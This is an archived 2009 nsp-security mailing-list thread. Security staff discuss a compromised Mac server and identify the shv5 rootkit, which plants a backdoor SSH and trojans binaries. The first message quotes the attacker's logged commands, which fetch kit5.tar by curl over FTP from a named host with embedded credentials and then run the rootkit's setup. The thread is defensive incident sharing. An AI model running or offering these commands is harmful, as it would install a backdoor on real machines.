[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347
Smith, Donald
Donald.Smith at qwest.com
Mon Mar 30 16:07:38 EDT 2009
Oh, probably but its not too big a deal there are copies of it all over the place.
I grabbed a copy and if/when I get the time will compare this to other versions of this root kit I have looked at in the past.
Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com gcia
> -----Original Message-----
> From: Joel Rosenblatt [mailto:joel at columbia.edu]
> Sent: Monday, March 30, 2009 1:18 PM
> To: Smith, Donald
> Cc: Joel Rosenblatt; nsp-security at puck.nether.net
> Subject: RE: [nsp-sec] MAC root kit found on
> www.funmangames.com 208.113.230.135- ASN 26347
>
> Thanks Donald.
>
> Our standard fix is nuke and pave .. I meant removed from the
> machine serving it :-)
>
> Regards,
> Joel
>
> --On Monday, March 30, 2009 12:49 PM -0600 "Smith, Donald"
> <Donald.Smith at qwest.com> wrote:
>
> > That is shv5 a unix root kit. They may have updated it to
> complile on macs but its been around for years.
> > It can be removed.
> > Rootkit hunter can detect it.
> http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
> > chkrootkit also finds it. http://www.chkrootkit.org
> >
> > Primarily it puts up a back door ssh and trojans several binaries.
> >
> >
> >
> >
> > Security through obscurity WORKS against some worms and ssh
> attacks:)
> > Donald.Smith at qwest.com gcia
> >
> >> -----Original Message-----
> >> From: nsp-security-bounces at puck.nether.net
> >> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> >> Joel Rosenblatt
> >> Sent: Monday, March 30, 2009 12:01 PM
> >> To: nsp-security at puck.nether.net
> >> Subject: [nsp-sec] MAC root kit found on www.funmangames.com
> >> 208.113.230.135- ASN 26347
> >>
> >> ----------- nsp-security Confidential --------
> >>
> >> Hi,
> >>
> >> We had a break in of a Mac server (bad root password .. duh)
> >> - upon going through the log of commands run, we came across
> >>
> >> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
> >>
> >> tar xzf kit5.tar
> >>
> >> ls -a
> >>
> >> cd shv5
> >>
> >> ./setup abelha 54
> >>
> >> It appears to be a Mac root kit.
> >>
> >> AS | IP | AS Name
> >> 26347 | 208.113.230.135 | DREAMHOST-AS - New Dream Network, LLC
> >>
> >> I wonder if it could be removed.
> >>
> >> Thanks,
> >> Joel Rosenblatt
> >>
> >> Joel Rosenblatt, Manager Network & Computer Security
> >> Columbia Information Security Office (CISO)
> >> Columbia University, 612 W 115th Street, NY, NY 10025 /
> 212 854 3033
> >> http://www.columbia.edu/~joel
> >>
> >>
> >>
> >> _______________________________________________
> >> nsp-security mailing list
> >> nsp-security at puck.nether.net
> >> https://puck.nether.net/mailman/listinfo/nsp-security
> >>
> >> Please do not Forward, CC, or BCC this E-mail outside of the
> >> nsp-security
> >> community. Confidentiality is essential for effective
> >> Internet security counter-measures.
> >> _______________________________________________
> >>
> >>
>
>
>
> Joel Rosenblatt, Manager Network & Computer Security
> Columbia Information Security Office (CISO)
> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
> http://www.columbia.edu/~joel
>
>
More information about the nsp-security
mailing list